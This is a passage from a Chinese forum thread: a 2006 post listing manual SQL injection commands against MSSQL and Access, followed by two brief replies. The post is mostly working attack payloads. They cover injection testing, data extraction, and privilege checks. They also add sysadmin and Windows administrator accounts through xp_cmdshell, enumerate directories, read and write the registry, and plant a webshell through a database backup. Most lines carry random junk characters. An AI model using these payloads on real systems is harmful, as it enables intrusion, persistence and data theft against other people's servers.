社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3855阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 7P}&<;5zD  
  2.初步判断是否是mssql ;and user>0 o&2(xI2  
 /[f9Z:>V  
  3.注入参数是字符'and [查询条件] and ''=' F?b5!<5  
NYwE=b~I  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' s7RAui  
H38ODWO3  
  5.判断数据库系统 Y8I*B =7  
NABwtx>.  
  ;and (select count(*) from sysobjects)>0 mssql g70B22!y  
<^j,jX  
  ;and (select count(*) from msysobjects)>0 access r5ONAa3.  
WLr\ l29  
/A3tY"Vn  
X}?`G?'  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 ><o dBM-  
j6wdqa9!~  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Hm=!;xAFX  
VEAf,{)Q  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 V:?exJg9  
s;-(dQ{O  
  9.(1)猜字段的ascii值(access) #DMt<1#:  
Gv,_;?7lD  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 8=;'kEU  
L\L/+yNv:G  
  (2)猜字段的ascii值(mssql) }K\] M@  
UR')) 1n  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 h+o-h4X  
s53 Pw>f  
  10.测试权限结构(mssql) %";bgU2Q  
>"qnuv G  
I$@0FSl  
H.sHXuu  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?3ldHWa  
Z1j3F  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- BLzl XhHn  
hr9[$4'H  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ` <+MR6M  
uW*)B_c  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |/,XdTSy  
e 5hq> K  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- T%kr&XsQX  
tuzw% =Ey  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- rwb7>]UI"d  
0pT?qsM2  
  ;and 1=(select IS_MEMBER('db_owner'));-- ^J,Zl`N  
Kj| l]'  
gzS6{570  
?[#nh@mI  
  11.添加mssql和系统的帐户  5VWyc9Q  
Q/EHvb]  
  ;exec master.dbo.sp_addlogin username;-- }E626d}uA  
  ;exec master.dbo.sp_password null,username,password;-- [R$iX  
G }B)bM2  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 4L(/Z}(  
(=n{LMa  
  ;exec master.dbo.xp_cmdshell 'net user username password 3z$9jN/<u  
"M.\Z9BCt  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 'l,ym~R  
Opc, {,z6  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- .t\#>Fe  
|E/r64T  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- `w@8i[2J  
L;d(|7BVv  
5;{Q >n  
Ke0j8|  
  12.(1)遍历目录 :77dl/d%  
]"Y? ZS;H  
  ;create table dirs(paths varchar(100), id int) G:'hT=8  
dtHB@\1  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' IKT3T_\-I  
$n |)M+d  
  ;and (select top 1 paths from dirs)>0 ,,_$r7H`  
r+6=b"  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) !g=2U`j^  
I<p- o/TP  
Z(F`M;1>xI  
49vKb(bz{  
  (2)遍历目录 DbRq,T  
1D3{\v  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- g"pjWj)?  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 pY75S5h:  
Gt >*y.]  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 n#F:(MSOp  
>K<n~;ON|  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 luNEgCq  
kzq3-NTV  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Yyl(<,Yi  
x+niY;Z E  
y7a84)j3  
WvV!F?uqZ  
  13.mssql中的存储过程 %Z T@&  
8_yhV{  
  xp_regenumvalues 注册表根键, 子键 W dM?{; #  
v(5zSo  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ^! ?wh  
ma__LWKM,  
  xp_regread 根键,子键,键值名 b#XY.+ *0  
WX@ a2c.'  
  ;exec xp_regread v?\Z4Z|f  
C t-^-XD  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g<ZB9;FX %  
5,H,OZ}  
  xp_regwrite 根键,子键, 值名, 值类型, 值 HB+{vuN*L  
0O,Q]P 82f  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 IIrp-EMXJ  
$CT 2E  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 >"}z % #  
i@Vi.oc4[  
  xp_regdeletevalue 根键,子键,值名 Qf HJZ7K.4  
>x /;'Y.  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 s/' ]* n  
FVi7gg.?  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 puE!7 :X7  
'JA<q-Gn  
ZboY]1L[j  
VZ69s{/.B  
  14.mssql的backup创建webshell PcxCal4  
>M`ryM2=D  
  use model W7R`})F  
IYZ$a/{P  
  create table cmd(str image); 9c `Vrlu  
>P-{2 a,4  
  insert into cmd(str) values (''); ExJch\  
'fIBJ3s[o  
  backup database model to disk='c:\l.asp'; |2ttdc.  
6;JlA})  
j>D[iHrH  
2D`_!OG=  
  15.mssql内置函数 j,:vK  
B)^uGS W  
  ;and (select @@version)>0 获得Windows的版本号 -pb>=@Yq  
)I/K-zj  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa \%=GM J^[p  
y5oC|v7  
  ;and (select user_name())>0 爆当前系统的连接用户 B<et&r;  
$7\!  
  ;and (select db_name())>0 得到当前连接的数据库 g#??Mz   
.=I:cniw\r  
}{3XbvC  
BRSOE U\=  
  16.简洁的webshell oQsls9t  
'h]sq {  
  use model at(oepq  
;s$bVGHr  
  create table cmd(str image); 9/LnO'&-  
-FxE!K  
  insert into cmd(str) values (''); JZc"4qf@OT  
d z-  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
10+5=?,请输入中文答案:十五